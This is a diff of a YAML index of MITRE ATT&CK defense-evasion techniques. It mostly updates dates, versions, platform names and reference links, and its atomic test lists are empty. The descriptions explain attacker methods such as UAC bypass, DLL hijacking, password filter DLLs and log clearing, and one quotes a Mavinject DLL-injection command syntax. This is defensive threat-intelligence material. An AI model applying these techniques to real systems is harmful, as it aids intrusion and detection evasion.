       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -950,12 +1037,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests: []
   T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -2404,8 +2473,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -2484,8 +2550,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
